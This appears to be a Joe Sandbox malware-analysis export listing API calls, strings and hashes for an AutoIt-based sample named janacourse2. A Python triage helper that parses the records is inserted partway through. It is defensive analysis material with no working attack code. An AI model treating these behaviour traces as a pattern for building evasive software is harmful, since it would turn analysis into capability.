                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                            • String ID: ComboBox$ListBox
                                                                                                            • API String ID: 624084870-1403004172
                                                                                                            • Opcode ID: facd492e1c3aa67a6c9446e54c34e540d732a20e1a3d21ad93356b65ad558c09
                                                                                                            • Instruction ID: dcbd0c7786c1755d43aec5a34d1b810eab704d969edbfa5b882e09ff6163b868
                                                                                                            • Opcode Fuzzy Hash: facd492e1c3aa67a6c9446e54c34e540d732a20e1a3d21ad93356b65ad558c09
                                                                                                            • Instruction Fuzzy Hash: 15F04970A0021967DB08F7A5CC81BFF77A8AB01350F400808BAA2672C4EA7855088760
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen
                                                                                                            • String ID: 3, 3, 16, 1
                                                                                                            • API String ID: 176396367-3042988571
                                                                                                            • Opcode ID: 9c3284a6ef4b2411c3b8476176b6d521bd165db01887e4f0255910b282d27005
                                                                                                            • Instruction ID: 8297262f460bb87fdb590bed396ba0e8a1f60b7a3bb2cdf9f320a1c3791ef4e5
                                                                                                            • Opcode Fuzzy Hash: 9c3284a6ef4b2411c3b8476176b6d521bd165db01887e4f0255910b282d27005
                                                                                                            • Instruction Fuzzy Hash: 67E02B42601320219271137F9CC197F7ACECFC9690714182BFAC5C2366EFA8ED9193A1
                                                                                                            APIs
                                                                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 01010B23
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message
                                                                                                            • String ID: AutoIt$Error allocating memory.
                                                                                                            • API String ID: 2030045667-4017498283
                                                                                                            • Opcode ID: 571db099590e1c4caee01eb18dcec0ec7533ccaae916ea4d46b5068085aaf458
                                                                                                            • Instruction ID: 9b1cb56fa469f093ec00c027b9238394a49b2bc485c47771c034107bc35486ce
                                                                                                            • Opcode Fuzzy Hash: 571db099590e1c4caee01eb18dcec0ec7533ccaae916ea4d46b5068085aaf458
                                                                                                            • Instruction Fuzzy Hash: 9CE0D83128531837E2143795BE43FC97B859F05B10F10446EFBD4995C38EDA249016ED
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FCF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00FD0D71,?,?,?,00FB100A), ref: 00FCF7CE
                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,00FB100A), ref: 00FD0D75
                                                                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00FB100A), ref: 00FD0D84
                                                                                                            Strings
                                                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00FD0D7F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                            • API String ID: 55579361-631824599
                                                                                                            • Opcode ID: ffcd99318178deb79fa3f10f979363158bd7d8e1e8ac14d5402cf9f866113f29
                                                                                                            • Instruction ID: 287e5590bd4cd92a42f350f103faff0adc85ea85f5e68f0d9b88eb94430db404
                                                                                                            • Opcode Fuzzy Hash: ffcd99318178deb79fa3f10f979363158bd7d8e1e8ac14d5402cf9f866113f29
                                                                                                            • Instruction Fuzzy Hash: F7E06DB42003028BE3309FBEE6447467BE2AF04B45F04892EE4C6C7746DFB9E4449BA1
                                                                                                            APIs
                                                                                                            • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0102302F
                                                                                                            • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 01023044
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Temp$FileNamePath
                                                                                                            • String ID: aut
                                                                                                            • API String ID: 3285503233-3010740371
                                                                                                            • Opcode ID: a58688428f20d6645818598147587777666f0d2b4a206942fd71469bffc7d844
                                                                                                            • Instruction ID: b2d4cd4b920d02d070e715df4994f445699993e8575fc3e2cad99d9419c6e2a8
                                                                                                            • Opcode Fuzzy Hash: a58688428f20d6645818598147587777666f0d2b4a206942fd71469bffc7d844
                                                                                                            • Instruction Fuzzy Hash: 9CD05BB550131477EB30A6959E4DFC73A6CD704650F0001517695D6085DAF59544CFD4
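The records in this listing share one shape: an `APIs` block with one line per resolved call (sub-calls indented and prefixed with "Part of subcall function"), an optional `Strings` block with xrefs, the memory dump source, and a `Similarity` block carrying the API ID, String ID and opcode/instruction hashes. The Python below is an added triage helper, not part of the Joe Sandbox report or its tooling. It parses that text shape, decodes the raw window-message numbers that the SendMessageW/PostMessageW wrappers above pass as their second argument (0x0180 LB_ADDSTRING, 0x0182 LB_DELETESTRING, 0x018B LB_GETCOUNT, 0x01A2 LB_FINDSTRINGEXACT, 0x0111 WM_COMMAND), and tags the routines a reviewer would want to revisit. The embedded sample is a constructed excerpt in the page's record format (indentation and dump-source lines dropped; the last record deliberately has no Similarity block so the parser is exercised on a truncated record). The tag names and the `MSG_NAMES` table are this example's own choices. Two caveats it encodes: the IsDebuggerPresent call that sits next to the `CAtlBaseModule` string is the stock ATL module constructor, so by itself it is weak evidence of author-written anti-debugging; and the `aut` prefix handed to GetTempFileNameW is the AutoIt runtime's own, which yields `aut<hex>.tmp` files under %TEMP% and is a useful host artefact when hunting for this sample.

```python
"""Triage helper for the per-function records of a Joe Sandbox text export (added example)."""
import re

# Window messages seen as the 2nd argument of SendMessageW/PostMessageW in this listing.
MSG_NAMES = {0x0111: "WM_COMMAND", 0x0180: "LB_ADDSTRING", 0x0182: "LB_DELETESTRING",
             0x018B: "LB_GETCOUNT", 0x01A2: "LB_FINDSTRINGEXACT"}

# Constructed excerpt in the report's record shape (indentation and dump-source
# lines dropped; the last record has no Similarity block on purpose).
SAMPLE = """\
APIs
  • Part of subcall function 01013CA7: GetClassNameW.USER32(?,?,000000FF), ref: 01013CCA
• SendMessageW.USER32(?,00000180,00000000,?), ref: 01011C46
Strings
Similarity
• API ID: ClassMessageNameSend_wcslen
• String ID: ComboBox$ListBox
• Opcode ID: 105daad3384d54212fd97df4528609b1f9c51c8c88b9183e5872d79dac8d453f
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,00FB100A), ref: 00FD0D75
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00FB100A), ref: 00FD0D84
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00FD0D7F
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
• Opcode ID: ffcd99318178deb79fa3f10f979363158bd7d8e1e8ac14d5402cf9f866113f29
APIs
• GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0102302F
• GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 01023044
Similarity
• API ID: Temp$FileNamePath
• String ID: aut
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0104232C
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0104233F
  • Part of subcall function 0101E97B: Sleep.KERNEL32 ref: 0101E9F3
"""

API_LINE = re.compile(r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-F]+:\s*)?(?P<name>\w+)\."
                      r"(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")
STRING_LINE = re.compile(r"^\s*•\s*(?P<text>.*?), xrefs: [0-9A-F]+\s*$")
FIELD_LINE = re.compile(r"^\s*•\s*(?P<key>API ID|String ID|Opcode ID):\s*(?P<val>.*?)\s*$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


def parse_records(text):
    """Split the listing into one dict per function; lines it does not recognise are ignored."""
    records, rec, section = [], None, None
    for line in text.splitlines():
        bare = line.strip()
        if bare in SECTIONS:
            if bare == "APIs":  # every function record opens with its APIs block
                rec = {"apis": [], "strings": [], "api_id": None, "string_id": None, "opcode_id": None}
                records.append(rec)
            section = bare
        elif rec is None:
            continue
        elif section == "APIs" and (m := API_LINE.match(line)):
            args = m.group("args")
            rec["apis"].append({"name": m.group("name"), "module": m.group("module"),
                                "args": args.split(",") if args is not None else [],
                                "ref": m.group("ref"), "subcall": m.group("sub") is not None})
        elif section == "Strings" and (m := STRING_LINE.match(line)):
            rec["strings"].append(m.group("text"))
        elif section == "Similarity" and (m := FIELD_LINE.match(line)):
            rec[m.group("key").lower().replace(" ", "_")] = m.group("val")
    return records


def decode_message(hex_arg):
    """Symbolic name for a window-message literal; None when the sandbox left it as '?'."""
    try:
        value = int(hex_arg, 16)
    except ValueError:
        return None
    return MSG_NAMES.get(value, f"0x{value:04X}")


def triage(rec):
    """Tags worth a second look on one record; the tag names are this example's own."""
    tags = set()
    for call in rec["apis"]:
        name, args = call["name"], call["args"]
        if name in ("SendMessageW", "PostMessageW") and len(args) > 1:
            if (msg := decode_message(args[1])):
                tags.add(f"user32-msg:{msg}")
        elif name == "IsDebuggerPresent":
            tags.add("anti-debug:IsDebuggerPresent")
        elif name == "GetTempFileNameW" and len(args) > 1:
            tags.add(f"temp-file-prefix:{args[1]}")  # AutoIt's runtime passes 'aut' -> aut<hex>.tmp
        elif name == "FindWindowW" and args and args[0] == "Shell_TrayWnd":
            tags.add("taskbar-window-lookup")
    if any("CAtlBaseModule" in s for s in rec["strings"]):
        # IsDebuggerPresent beside this string is stock ATL start-up code, not custom anti-debugging.
        tags.add("atl-runtime-init")
    return tags


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        direct = [c["name"] for c in rec["apis"] if not c["subcall"]]
        print(rec["api_id"] or "<no Similarity block>", direct, sorted(triage(rec)))
```

Run it against the full text export of the report to get one line per function with its direct calls and tags; records whose only tag is `atl-runtime-init` plus `anti-debug:IsDebuggerPresent` can be deprioritised, while `temp-file-prefix:aut` points at the file names to look for on a suspected host.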
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LocalTime
                                                                                                            • String ID: %.3d$X64
                                                                                                            • API String ID: 481472006-1077770165
                                                                                                            APIs
                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0104232C
                                                                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0104233F
                                                                                                              • Part of subcall function 0101E97B: Sleep.KERNEL32 ref: 0101E9F3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                            • String ID: Shell_TrayWnd
                                                                                                            • API String ID: 529655941-2988720461
                                                                                                            APIs
                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0104236C
                                                                                                            • PostMessageW.USER32(00000000), ref: 01042373
                                                                                                              • Part of subcall function 0101E97B: Sleep.KERNEL32 ref: 0101E9F3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                            • String ID: Shell_TrayWnd
                                                                                                            • API String ID: 529655941-2988720461
                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00FEBE93
                                                                                                            • GetLastError.KERNEL32 ref: 00FEBEA1
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00FEBEFC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 1717984340-0